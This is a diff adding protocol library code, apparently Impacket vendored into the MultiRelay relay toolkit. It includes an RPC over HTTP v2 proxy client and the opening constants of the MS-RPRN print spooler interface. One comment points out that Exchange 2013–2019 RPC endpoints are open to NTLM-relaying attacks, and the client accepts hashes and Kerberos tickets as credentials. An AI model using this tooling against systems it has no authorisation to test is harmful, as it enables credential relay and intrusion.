+RTS_CMD_ASSOCIATION_GROUP_ID     = 0x0000000C
+RTS_CMD_DESTINATION              = 0x0000000D
+RTS_CMD_PING_TRAFFIC_SENT_NOTIFY = 0x0000000E
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+# 2.2.3.1 RTS Cookie
+class RTSCookie(Structure):
+    structure = (
+        ('Cookie','16s=b"\\x00"*16'),
+    )
+
+# 2.2.3.2 Client Address
+class EncodedClientAddress(Structure):
+    structure = (
+        ('AddressType','<L=(0 if len(ClientAddress) == 4 else 1)'),
+        ('_ClientAddress','_-ClientAddress','4 if AddressType == 0 else 16'),
+        ('ClientAddress',':'),
+        ('Padding','12s=b"\\x00"*12'),
+    )
+
+# 2.2.3.4 Flow Control Acknowledgment
+class Ack(Structure):
+    structure = (
+        ('BytesReceived','<L=0'),
+        ('AvailableWindow','<L=0'),
+        ('ChannelCookie',':',RTSCookie),
+    )
+
+# 2.2.3.5.1 ReceiveWindowSize
+class ReceiveWindowSize(Structure):
+    structure = (
+        ('CommandType','<L=0'),
+        ('ReceiveWindowSize','<L=262144'),
+    )
+
+# 2.2.3.5.2 FlowControlAck
+class FlowControlAck(Structure):
+    structure = (
+        ('CommandType','<L=1'),
+        ('Ack',':',Ack),
+    )
+
+# 2.2.3.5.3 ConnectionTimeout
+class ConnectionTimeout(Structure):
+    structure = (
+        ('CommandType','<L=2'),
+        ('ConnectionTimeout','<L=120000'),
+    )
+
+# 2.2.3.5.4 Cookie
+class Cookie(Structure):
+    structure = (
+        ('CommandType','<L=3'),
+        ('Cookie',':',RTSCookie),
+    )
+
+# 2.2.3.5.5 ChannelLifetime
+class ChannelLifetime(Structure):
+    structure = (
+        ('CommandType','<L=4'),
+        ('ChannelLifetime','<L=1073741824'),
+    )
+
+# 2.2.3.5.6 ClientKeepalive
+#
+# By the spec, ClientKeepalive value can be 0 or in the inclusive
+# range of 60,000 through 4,294,967,295.
+# If it is 0, it MUST be interpreted as 300,000.
+#
+# But do not set it to 0, it will cause 0x6c0 rpc error.
+class ClientKeepalive(Structure):
+    structure = (
+        ('CommandType','<L=5'),
+        ('ClientKeepalive','<L=300000'),
+    )
+
+# 2.2.3.5.7 Version
+class Version(Structure):
+    structure = (
+        ('CommandType','<L=6'),
+        ('Version','<L=1'),
+    )
+
+# 2.2.3.5.8 Empty
+class Empty(Structure):
+    structure = (
+        ('CommandType','<L=7'),
+    )
+
+# 2.2.3.5.9 Padding
+class Padding(Structure):
+    structure = (
+        ('CommandType','<L=8'),
+        ('ConformanceCount','<L=len(Padding)'),
+        ('Padding','*ConformanceCount'),
+    )
+
+# 2.2.3.5.10 NegativeANCE
+class NegativeANCE(Structure):
+    structure = (
+        ('CommandType','<L=9'),
+    )
+
+# 2.2.3.5.11 ANCE
+class ANCE(Structure):
+    structure = (
+        ('CommandType','<L=0xA'),
+    )
+
+# 2.2.3.5.12 ClientAddress
+class ClientAddress(Structure):
+    structure = (
+        ('CommandType','<L=0xB'),
+        ('ClientAddress',':',EncodedClientAddress),
+    )
+
+# 2.2.3.5.13 AssociationGroupId
+class AssociationGroupId(Structure):
+    structure = (
+        ('CommandType','<L=0xC'),
+        ('AssociationGroupId',':',RTSCookie),
+    )
+
+# 2.2.3.5.14 Destination
+class Destination(Structure):
+    structure = (
+        ('CommandType','<L=0xD'),
+        ('Destination','<L'),
+    )
+
+# 2.2.3.5.15 PingTrafficSentNotify
+class PingTrafficSentNotify(Structure):
+    structure = (
+        ('CommandType','<L=0xE'),
+        ('PingTrafficSent','<L'),
+    )
+
+COMMANDS = {
+    0x0: ReceiveWindowSize,
+    0x1: FlowControlAck,
+    0x2: ConnectionTimeout,
+    0x3: Cookie,
+    0x4: ChannelLifetime,
+    0x5: ClientKeepalive,
+    0x6: Version,
+    0x7: Empty,
+    0x8: Padding,
+    0x9: NegativeANCE,
+    0xA: ANCE,
+    0xB: ClientAddress,
+    0xC: AssociationGroupId,
+    0xD: Destination,
+    0xE: PingTrafficSentNotify,
+}
+
+# 2.2.3.6.1 RTS PDU Header
+# The RTS PDU Header has the same layout as the common header of
+# the connection-oriented RPC PDU as specified in [C706] section 12.6.1,
+# with a few additional requirements around the contents of the header fields.
+class RTSHeader(MSRPCHeader):
+    _SIZE = 20
+    commonHdr = MSRPCHeader.commonHdr + (
+        ('Flags','<H=0'),             # 16
+        ('NumberOfCommands','<H=0'),  # 18
+    )
+
+    def __init__(self, data=None, alignment=0):
+        MSRPCHeader.__init__(self, data, alignment)
+        self['type'] = MSRPC_RTS
+        self['flags'] = PFC_FIRST_FRAG | PFC_LAST_FRAG
+        self['auth_length'] = 0
+        self['call_id'] = 0
+
+# 2.2.4.2 CONN/A1 RTS PDU
+#
+# The CONN/A1 RTS PDU MUST be sent from the client to the outbound proxy on the OUT channel to
+# initiate the establishment of a virtual connection.
+class CONN_A1_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('VirtualConnectionCookie',':',Cookie),
+        ('OutChannelCookie',':',Cookie),
+        ('ReceiveWindowSize',':',ReceiveWindowSize),
+    )
+
+# 2.2.4.5 CONN/B1 RTS PDU
+#
+# The CONN/B1 RTS PDU MUST be sent from the client to the inbound proxy on the IN channel to
+# initiate the establishment of a virtual connection.
+class CONN_B1_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('VirtualConnectionCookie',':',Cookie),
+        ('INChannelCookie',':',Cookie),
+        ('ChannelLifetime',':',ChannelLifetime),
+        ('ClientKeepalive',':',ClientKeepalive),
+        ('AssociationGroupId',':',AssociationGroupId),
+    )
+
+# 2.2.4.4 CONN/A3 RTS PDU
+#
+# The CONN/A3 RTS PDU MUST be sent from the outbound proxy to the client on the OUT channel to
+# continue the establishment of the virtual connection.
+class CONN_A3_RTS_PDU(Structure):
+    structure = (
+        ('ConnectionTimeout',':',ConnectionTimeout),
+    )
+
+# 2.2.4.9 CONN/C2 RTS PDU
+#
+# The CONN/C2 RTS PDU MUST be sent from the outbound proxy to the client on the OUT channel to
+# notify it that a virtual connection has been established.
+class CONN_C2_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('ReceiveWindowSize',':',ReceiveWindowSize),
+        ('ConnectionTimeout',':',ConnectionTimeout),
+    )
+
+# 2.2.4.51 FlowControlAckWithDestination RTS PDU
+class FlowControlAckWithDestination_RTS_PDU(Structure):
+    structure = (
+        ('Destination',':',Destination),
+        ('FlowControlAck',':',FlowControlAck),
+    )
+
+################################################################################
+# HELPERS
+################################################################################
+def hCONN_A1(virtualConnectionCookie=EMPTY_UUID, outChannelCookie=EMPTY_UUID, receiveWindowSize=262144):
+    conn_a1 = CONN_A1_RTS_PDU()
+    conn_a1['Version'] = Version()
+    conn_a1['VirtualConnectionCookie'] = Cookie()
+    conn_a1['VirtualConnectionCookie']['Cookie'] = virtualConnectionCookie
+    conn_a1['OutChannelCookie'] = Cookie()
+    conn_a1['OutChannelCookie']['Cookie'] = outChannelCookie
+    conn_a1['ReceiveWindowSize'] = ReceiveWindowSize()
+    conn_a1['ReceiveWindowSize']['ReceiveWindowSize'] = receiveWindowSize
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_NONE
+    packet['NumberOfCommands'] = len(conn_a1.structure)
+    packet['pduData'] = conn_a1.getData()
+
+    return packet.getData()
+
+def hCONN_B1(virtualConnectionCookie=EMPTY_UUID, inChannelCookie=EMPTY_UUID, associationGroupId=EMPTY_UUID):
+    conn_b1 = CONN_B1_RTS_PDU()
+    conn_b1['Version'] = Version()
+    conn_b1['VirtualConnectionCookie'] = Cookie()
+    conn_b1['VirtualConnectionCookie']['Cookie'] = virtualConnectionCookie
+    conn_b1['INChannelCookie'] = Cookie()
+    conn_b1['INChannelCookie']['Cookie'] = inChannelCookie
+    conn_b1['ChannelLifetime'] = ChannelLifetime()
+    conn_b1['ClientKeepalive'] = ClientKeepalive()
+    conn_b1['AssociationGroupId'] = AssociationGroupId()
+    conn_b1['AssociationGroupId']['AssociationGroupId'] = RTSCookie()
+    conn_b1['AssociationGroupId']['AssociationGroupId']['Cookie'] = associationGroupId
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_NONE
+    packet['NumberOfCommands'] = len(conn_b1.structure)
+    packet['pduData'] = conn_b1.getData()
+
+    return packet.getData()
+
+def hFlowControlAckWithDestination(destination, bytesReceived, availableWindow, channelCookie):
+    rts_pdu = FlowControlAckWithDestination_RTS_PDU()
+    rts_pdu['Destination'] = Destination()
+    rts_pdu['Destination']['Destination'] = destination
+    rts_pdu['FlowControlAck'] = FlowControlAck()
+    rts_pdu['FlowControlAck']['Ack'] = Ack()
+    rts_pdu['FlowControlAck']['Ack']['BytesReceived'] = bytesReceived
+    rts_pdu['FlowControlAck']['Ack']['AvailableWindow'] = availableWindow
+
+    # Cookie of the channel for which the traffic received is being acknowledged
+    rts_pdu['FlowControlAck']['Ack']['ChannelCookie'] = RTSCookie()
+    rts_pdu['FlowControlAck']['Ack']['ChannelCookie']['Cookie'] = channelCookie
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_OTHER_CMD
+    packet['NumberOfCommands'] = len(rts_pdu.structure)
+    packet['pduData'] = rts_pdu.getData()
+
+    return packet.getData()
+
+def hPing():
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_PING
+
+    return packet.getData()
+
+################################################################################
+# CLASSES
+################################################################################
+class RPCProxyClient(HTTPClientSecurityProvider):
+    RECV_SIZE = 8192
+    default_headers = {'User-Agent'   : 'MSRPC',
+                       'Cache-Control': 'no-cache',
+                       'Connection'   : 'Keep-Alive',
+                       'Expect'       : '100-continue',
+                       'Accept'       : 'application/rpc',
+                       'Pragma'       : 'No-cache'
+                      }
+
+    def __init__(self, remoteName=None, dstport=593):
+        HTTPClientSecurityProvider.__init__(self)
+        self.__remoteName  = remoteName
+        self.__dstport     = dstport
+
+        # Chosen auth type
+        self.__auth_type = None
+
+        self.init_state()
+
+    def init_state(self):
+        self.__channels    = {}
+
+        self.__inChannelCookie         = uuid.generate()
+        self.__outChannelCookie        = uuid.generate()
+        self.__associationGroupId      = uuid.generate()
+        self.__virtualConnectionCookie = uuid.generate()
+
+        self.__serverConnectionTimeout = None
+        self.__serverReceiveWindowSize = None
+        self.__availableWindowAdvertised = 262144 # 256k
+        self.__receiverAvailableWindow = self.__availableWindowAdvertised
+        self.__bytesReceived = 0
+
+        self.__serverChunked = False
+        self.__readBuffer = b''
+        self.__chunkLeft = 0
+
+        self.rts_ping_received = False
+
+    def set_proxy_credentials(self, username, password, domain='', lmhash='', nthash=''):
+        LOG.error("DeprecationWarning: Call to deprecated method set_proxy_credentials (use set_credentials).")
+        self.set_credentials(username, password, domain, lmhash, nthash)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        HTTPClientSecurityProvider.set_credentials(self, username, password,
+            domain, lmhash, nthash, aesKey, TGT, TGS)
+
+    def create_rpc_in_channel(self):
+        headers = self.default_headers.copy()
+        headers['Content-Length'] = '1073741824'
+
+        self.create_channel('RPC_IN_DATA', headers)
+
+    def create_rpc_out_channel(self):
+        headers = self.default_headers.copy()
+        headers['Content-Length'] = '76'
+
+        self.create_channel('RPC_OUT_DATA', headers)
+
+    def create_channel(self, method, headers):
+        self.__channels[method] = HTTPClientSecurityProvider.connect(self, self._rpcProxyUrl.scheme,
+                                    self._rpcProxyUrl.netloc)
+
+        auth_headers = HTTPClientSecurityProvider.get_auth_headers(self, self.__channels[method],
+                           method, self._rpcProxyUrl.path, headers)[0]
+
+        headers_final = {}
+        headers_final.update(headers)
+        headers_final.update(auth_headers)
+
+        self.__auth_type = HTTPClientSecurityProvider.get_auth_type(self)
+
+        # To connect to an RPC Server, we need to let the RPC Proxy know
+        # where to connect. The target RPC Server name and its port are passed
+        # in the query of the HTTP request. The target RPC Server must be the ncacn_http
+        # service.
+        #
+        # The utilized format: /rpc/rpcproxy.dll?RemoteName:RemotePort
+        #
+        # For RDG servers, you can specify localhost:3388, but in other cases you cannot
+        # use localhost as there will be no ACL for it.
+        #
+        # To know what RemoteName to use, we rely on Default ACL. It's specified
+        # in the HKLM\SOFTWARE\Microsoft\Rpc\RpcProxy key:
+        #
+        # ValidPorts    REG_SZ   COMPANYSERVER04:593;COMPANYSERVER04:49152-65535
+        #
+        # In this way, we can at least connect to the endpoint mapper on port 593.
+        # So, if the caller set remoteName to an empty string, we assume the target
+        # is the RPC Proxy server itself, and get its NetBIOS name from the NTLMSSP.
+        #
+        # Interestingly, if the administrator renames the server after RPC Proxy installation
+        # or joins the server to the domain after RPC Proxy installation, the ACL will remain
+        # the original. So, sometimes the ValidPorts values have the format WIN-JCKEDQVDOQU, and
+        # we are not able to use them.
+        #
+        # For Exchange servers, the value of the default ACL doesn't matter as they
+        # allow connections by their own mechanisms:
+        # - Exchange 2003 / 2007 / 2010 servers add their own ACL, which includes
+        #   NetBIOS names of all Exchange servers (and some other servers).
+        #   This ACL is regularly and automatically updated on each server.
+        #   Allowed ports: 6001-6004
+        #
+        #   6001 is used for MS-OXCRPC
+        #   6002 is used for MS-OXABREF
+        #   6003 is not used
+        #   6004 is used for MS-OXNSPI
+        #
+        #   Tests on Exchange 2010 show that MS-OXNSPI and MS-OXABREF are available
+        #   on both 6002 and 6004.
+        #
+        # - Exchange 2013 / 2016 / 2019 servers process RemoteName on their own
+        #   (via RpcProxyShim.dll), and the NetBIOS name format is supported only for
+        #   backward compatibility.
+        #
+        #   ! Default ACL is never used, so there is no way to connect to the endpoint mapper!
+        #
+        #   Allowed ports: 6001-6004
+        #
+        #   6001 is used for MS-OXCRPC
+        #   6002 is used for MS-OXABREF
+        #   6003 is not used
+        #   6004 is used for MS-OXNSPI
+        #
+        # Tests show that all protocols are available on the 6001 / 6002 / 6004 ports via
+        # RPC over HTTP v2, and the separation is only used for backward compatibility.
+        #
+        # The pure ncacn_http endpoint is available only on the 6001 TCP/IP port.
+        #
+        # RpcProxyShim.dll allows you to skip authentication on the RPC level to get
+        # a faster connection, and it makes Exchange 2013 / 2016 / 2019 RPC over HTTP v2
+        # endpoints vulnerable to NTLM-Relaying attacks.
+        #
+        # If the target is Exchange behind Microsoft TMG, you most likely need to specify
+        # the remote name manually using the value from /autodiscover/autodiscover.xml.
+        # Note that /autodiscover/autodiscover.xml might not be available with
+        # a non-outlook User-Agent.
+        #
+        # There may be multiple RPC Proxy servers with different NetBIOS names on
+        # a single external IP. We store the first one's NetBIOS name and use it for all
+        # the following channels.
+        # It's acceptable to assume all RPC Proxies have the same ACLs (true for Exchange).
+        if not self.__remoteName and self.__auth_type == AUTH_BASIC:
+            raise RPCProxyClientException(RPC_PROXY_REMOTE_NAME_NEEDED_ERR)
+
+        if not self.__remoteName:
+            ntlmssp = self.get_ntlmssp_info()
+            self.__remoteName = ntlmssp[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
+            self._stringbinding.set_network_address(self.__remoteName)
+            LOG.debug('StringBinding has been changed to %s' % self._stringbinding)
+
+        if not self._rpcProxyUrl.query:
+            query = self.__remoteName + ':' + str(self.__dstport)
+            self._rpcProxyUrl = self._rpcProxyUrl._replace(query=query)
+
+        path = self._rpcProxyUrl.path + '?' + self._rpcProxyUrl.query
+
+        self.__channels[method].request(method, path, headers=headers_final)
+        self._read_100_continue(method)
+
+    def _read_100_continue(self, method):
+        resp = self.__channels[method].sock.recv(self.RECV_SIZE)
+
+        while resp.find(b'\r\n\r\n') == -1:
+            resp += self.__channels[method].sock.recv(self.RECV_SIZE)
+
+        # Continue responses can have multiple lines, for example:
+        #
+        # HTTP/1.1 100 Continue
+        # Via: 1.1 FIREWALL1
+        #
+        # Don't expect the response to contain "100 Continue\r\n\r\n"
+        if resp[9:23] != b'100 Continue\r\n':
+            try:
+                # The server (IIS) may return localized error messages in
+                # the first line. Tests shown they are in UTF-8.
+                resp = resp.split(b'\r\n')[0].decode("UTF-8", errors='replace')
+
+                raise RPCProxyClientException('RPC Proxy Client: %s authentication failed in %s channel' %
+                    (self.__auth_type, method), proxy_error=resp)
+            except (IndexError, KeyError, AttributeError):
+                raise RPCProxyClientException('RPC Proxy Client: %s authentication failed in %s channel' %
+                    (self.__auth_type, method))
+
+    def create_tunnel(self):
+        # 3.2.1.5.3.1 Connection Establishment
+        packet = hCONN_A1(self.__virtualConnectionCookie, self.__outChannelCookie, self.__availableWindowAdvertised)
+        self.get_socket_out().send(packet)
+
+        packet = hCONN_B1(self.__virtualConnectionCookie, self.__inChannelCookie, self.__associationGroupId)
+        self.get_socket_in().send(packet)
+
+        resp = self.get_socket_out().recv(self.RECV_SIZE)
+
+        while resp.find(b'\r\n\r\n') == -1:
+            resp += self.get_socket_out().recv(self.RECV_SIZE)
+
+        if resp[9:12] != b'200':
+            try:
+                # The server (IIS) may return localized error messages in
+                # the first line. Tests shown they are in UTF-8.
+                resp = resp.split(b'\r\n')[0].decode("UTF-8", errors='replace')
+
+                raise RPCProxyClientException('RPC Proxy CONN/A1 request failed', proxy_error=resp)
+            except (IndexError, KeyError, AttributeError):
+                raise RPCProxyClientException('RPC Proxy CONN/A1 request failed')
+
+        if b'Transfer-Encoding: chunked' in resp:
+            self.__serverChunked = True
+
+        # If the body is here, let's send it to rpc_out_recv1()
+        self.__readBuffer = resp[resp.find(b'\r\n\r\n') + 4:]
+
+        # Recieving and parsing CONN/A3
+        conn_a3_rpc = self.rpc_out_read_pkt()
+        conn_a3_pdu = RTSHeader(conn_a3_rpc)['pduData']
+        conn_a3 = CONN_A3_RTS_PDU(conn_a3_pdu)
+        self.__serverConnectionTimeout = conn_a3['ConnectionTimeout']['ConnectionTimeout']
+
+        # Recieving and parsing CONN/C2
+        conn_c2_rpc = self.rpc_out_read_pkt()
+        conn_c2_pdu = RTSHeader(conn_c2_rpc)['pduData']
+        conn_c2 = CONN_C2_RTS_PDU(conn_c2_pdu)
+        self.__serverReceiveWindowSize = conn_c2['ReceiveWindowSize']['ReceiveWindowSize']
+
+    def get_socket_in(self):
+        return self.__channels['RPC_IN_DATA'].sock
+
+    def get_socket_out(self):
+        return self.__channels['RPC_OUT_DATA'].sock
+
+    def close_rpc_in_channel(self):
+        return self.__channels['RPC_IN_DATA'].close()
+
+    def close_rpc_out_channel(self):
+        return self.__channels['RPC_OUT_DATA'].close()
+
+    def check_http_error(self, buffer):
+        if buffer[:22] == b'HTTP/1.0 503 RPC Error':
+            raise RPCProxyClientException('RPC Proxy request failed', proxy_error=buffer)
+
+    def rpc_out_recv1(self, amt=None):
+        # Read with at most one underlying system call.
+        # The function MUST return the maximum amt bytes.
+        #
+        # Strictly speaking, it may cause more than one read,
+        # but that is ok, since that is to satisfy the chunked protocol.
+        sock = self.get_socket_out()
+
+        if self.__serverChunked is False:
+            if len(self.__readBuffer) > 0:
+                buffer = self.__readBuffer
+                self.__readBuffer = b''
+            else:
+                # Let's read RECV_SIZE bytes and not amt bytes.
+                # We would need to check the answer for HTTP errors, as
+                # they can just appear in the middle of the stream.
+                buffer = sock.recv(self.RECV_SIZE)
+
+            self.check_http_error(buffer)
+
+            if len(buffer) <= amt:
+                return buffer
+
+            # We received more than we need
+            self.__readBuffer = buffer[amt:]
+            return buffer[:amt]
+
+        # Check if the previous chunk is still there
+        if self.__chunkLeft > 0:
+            # If the previous chunk is still there,
+            # just give the caller what we already have
+            if amt >= self.__chunkLeft:
+                buffer = self.__readBuffer[:self.__chunkLeft]
+                # We may have recieved a part of a new chunk
+                self.__readBuffer = self.__readBuffer[self.__chunkLeft + 2:]
+                self.__chunkLeft = 0
+
+                return buffer
+            else:
+                buffer = self.__readBuffer[:amt]
+                self.__readBuffer = self.__readBuffer[amt:]
+                self.__chunkLeft -= amt
+
+                return buffer
+
+        # Let's start to process a new chunk
+        buffer = self.__readBuffer
+        self.__readBuffer = b''
+
+        self.check_http_error(buffer)
+
+        # Let's receive a chunk size field which ends with CRLF
+        # For Microsoft TMG 2010 it can cause more than one read
+        while buffer.find(b'\r\n') == -1:
+            buffer += sock.recv(self.RECV_SIZE)
+            self.check_http_error(buffer)
+
+        chunksize = int(buffer[:buffer.find(b'\r\n')], 16)
+        buffer = buffer[buffer.find(b'\r\n') + 2:]
+
+        # Let's read at least our chunk including final CRLF
+        while len(buffer) - 2 < chunksize:
+            buffer += sock.recv(chunksize - len(buffer) + 2)
+
+        # We should not be using any information from
+        # the TCP level to determine HTTP boundaries.
+        # So, we may have received more than we need.
+        if len(buffer) - 2 > chunksize:
+            self.__readBuffer = buffer[chunksize + 2:]
+            buffer = buffer[:chunksize + 2]
+
+        # Checking the amt
+        if len(buffer) - 2 > amt:
+            self.__chunkLeft = chunksize - amt
+            # We may have recieved a part of a new chunk before,
+            # so the concatenation is crucual
+            self.__readBuffer = buffer[amt:] + self.__readBuffer
+
+            return buffer[:amt]
+        else:
+            # Removing CRLF
+            return buffer[:-2]
+
+    def send(self, data, forceWriteAndx=0, forceRecv=0):
+        # We don't use chunked encoding for IN channel as
+        # Microsoft software is developed this way.
+        # If you do this, it may fail.
+        self.get_socket_in().send(data)
+
+    def rpc_out_read_pkt(self, handle_rts=False):
+        while True:
+            response_data = b''
+
+            # Let's receive common RPC header and no more
+            #
+            # C706
+            # 12.4 Common Fields
+            # Header encodings differ between connectionless and connection-oriented PDUs.
+            # However, certain fields use common sets of values with a consistent
+            # interpretation across the two protocols.
+            #
+            # This MUST recv MSRPCHeader._SIZE bytes, and not MSRPCRespHeader._SIZE bytes!
+            #
+            while len(response_data) < MSRPCHeader._SIZE:
+                response_data += self.rpc_out_recv1(MSRPCHeader._SIZE - len(response_data))
+
+            response_header = MSRPCHeader(response_data)
+
+            # frag_len contains the full length of the packet for both
+            # MSRPC and RTS
+            frag_len = response_header['frag_len']
+
+            # Receiving the full pkt and no more
+            while len(response_data) < frag_len:
+               response_data += self.rpc_out_recv1(frag_len - len(response_data))
+
+            # We need to do the Flow Control procedures
+            #
+            # 3.2.1.1.4
+            # This protocol specifies that only RPC PDUs are subject to the flow control abstract data
+            # model. RTS PDUs and the HTTP request and response headers are not subject to flow control.
+            if response_header['type'] != MSRPC_RTS:
+                self.flow_control(frag_len)
+
+            if handle_rts is True and response_header['type'] == MSRPC_RTS:
+                self.handle_out_of_sequence_rts(response_data)
+            else:
+                return response_data
+
+    def recv(self, forceRecv=0, count=0):
+        return self.rpc_out_read_pkt(handle_rts=True)
+
+    def handle_out_of_sequence_rts(self, response_data):
+        packet = RTSHeader(response_data)
+
+        #print("=========== RTS PKT ===========")
+        #print("RAW: %s" % binascii.hexlify(response_data))
+        #packet.dump()
+        #
+        #pduData = packet['pduData']
+        #numberOfCommands = packet['NumberOfCommands']
+        #
+        #server_cmds = []
+        #while numberOfCommands > 0:
+        #    numberOfCommands -= 1
+        #
+        #    cmd_type = unpack('<L', pduData[:4])[0]
+        #    cmd = COMMANDS[cmd_type](pduData)
+        #    server_cmds.append(cmd)
+        #    pduData = pduData[len(cmd):]
+        #
+        #for cmd in server_cmds:
+        #    cmd.dump()
+        #print("=========== / RTS PKT ===========")
+
+        # 2.2.4.49 Ping RTS PDU
+        if packet['Flags'] == RTS_FLAG_PING:
+            # 3.2.1.2.1 PingTimer
+            #
+            # If the SendingChannel is part of a Virtual Connection in the Outbound Proxy or Client roles, the
+            # SendingChannel maintains a PingTimer that on expiration indicates a PING PDU must be sent to the
+            # receiving channel. The PING PDU is sent to the receiving channel when no data has been sent within
+            # half of the value of the KeepAliveInterval.
+
+            # As we do not do long-term connections with no data transfer,
+            # it means something on the server-side is going wrong.
+            self.rts_ping_received = True
+            LOG.error("Ping RTS PDU packet received. Is the RPC Server alive?")
+
+            # Just in case it's a long operation, let's send PING PDU to IN Channel like in xfreerdp
+            # It's better to send more than one PING packet as it only 20 bytes long
+            packet = hPing()
+            self.send(packet)
+            self.send(packet)
+        # 2.2.4.24 OUT_R1/A2 RTS PDU
+        elif packet['Flags'] == RTS_FLAG_RECYCLE_CHANNEL:
+            raise RPCProxyClientException("The server requested recycling of a virtual OUT channel, " \
+                "but this function is not supported!")
+        # Ignore all other messages, most probably flow control acknowledgments
+        else:
+            pass
+
+    def flow_control(self, frag_len):
+        self.__bytesReceived += frag_len
+        self.__receiverAvailableWindow -= frag_len
+
+        if (self.__receiverAvailableWindow < self.__availableWindowAdvertised // 2):
+            self.__receiverAvailableWindow = self.__availableWindowAdvertised
+            packet = hFlowControlAckWithDestination(FDOutProxy, self.__bytesReceived,
+                self.__availableWindowAdvertised, self.__outChannelCookie)
+            self.send(packet)
+
+    def connect(self):
+        self.create_rpc_in_channel()
+        self.create_rpc_out_channel()
+        self.create_tunnel()
+
+    def disconnect(self):
+        self.close_rpc_in_channel()
+        self.close_rpc_out_channel()
+        self.init_state()

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rprn.py

@@ -0,0 +1,525 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-RPRN] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'RPRN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'RPRN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.1.7 STRING_HANDLE
+STRING_HANDLE = LPWSTR
+class PSTRING_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', STRING_HANDLE),
+    )
+
+# 2.2.3.1 Access Values
+JOB_ACCESS_ADMINISTER         = 0x00000010
+JOB_ACCESS_READ               = 0x00000020
+JOB_EXECUTE                   = 0x00020010
+JOB_READ                      = 0x00020020
+JOB_WRITE                     = 0x00020010
+JOB_ALL_ACCESS                = 0x000F0030
+PRINTER_ACCESS_ADMINISTER     = 0x00000004
+PRINTER_ACCESS_USE            = 0x00000008
+PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
+PRINTER_ALL_ACCESS            = 0x000F000C
+PRINTER_EXECUTE               = 0x00020008
+PRINTER_READ                  = 0x00020008
+PRINTER_WRITE                 = 0x00020008
+SERVER_ACCESS_ADMINISTER      = 0x00000001
+SERVER_ACCESS_ENUMERATE       = 0x00000002
+SERVER_ALL_ACCESS             = 0x000F0003
+SERVER_EXECUTE                = 0x00020002
+SERVER_READ                   = 0x00020002
+SERVER_WRITE                  = 0x00020003
+SPECIFIC_RIGHTS_ALL           = 0x0000FFFF
+STANDARD_RIGHTS_ALL           = 0x001F0000
+STANDARD_RIGHTS_EXECUTE       = 0x00020000
+STANDARD_RIGHTS_READ          = 0x00020000
+STANDARD_RIGHTS_REQUIRED      = 0x000F0000
+STANDARD_RIGHTS_WRITE         = 0x00020000
+SYNCHRONIZE                   = 0x00100000
+DELETE                        = 0x00010000
+READ_CONTROL                  = 0x00020000
+WRITE_DAC                     = 0x00040000
+WRITE_OWNER                   = 0x00080000
+GENERIC_READ                  = 0x80000000
+GENERIC_WRITE                 = 0x40000000
+GENERIC_EXECUTE               = 0x20000000
+GENERIC_ALL                   = 0x10000000
+
+# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
+PRINTER_CHANGE_SET_PRINTER        = 0x00000002
+PRINTER_CHANGE_DELETE_PRINTER     = 0x00000004
+PRINTER_CHANGE_PRINTER            = 0x000000FF
+PRINTER_CHANGE_ADD_JOB            = 0x00000100
+PRINTER_CHANGE_SET_JOB            = 0x00000200
+PRINTER_CHANGE_DELETE_JOB         = 0x00000400
+PRINTER_CHANGE_WRITE_JOB          = 0x00000800
+PRINTER_CHANGE_JOB                = 0x0000FF00
+PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
+PRINTER_CHANGE_TIMEOUT            = 0x80000000
+PRINTER_CHANGE_ALL                = 0x7777FFFF
+PRINTER_CHANGE_ALL_2              = 0x7F77FFFF
+
+# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
+PRINTER_CHANGE_ADD_PRINTER_DRIVER        = 0x10000000
+PRINTER_CHANGE_DELETE_PRINTER_DRIVER     = 0x40000000
+PRINTER_CHANGE_PRINTER_DRIVER            = 0x70000000
+PRINTER_CHANGE_ADD_FORM                  = 0x00010000
+PRINTER_CHANGE_DELETE_FORM               = 0x00040000
+PRINTER_CHANGE_SET_FORM                  = 0x00020000
+PRINTER_CHANGE_FORM                      = 0x00070000
+PRINTER_CHANGE_ADD_PORT                  = 0x00100000
+PRINTER_CHANGE_CONFIGURE_PORT            = 0x00200000
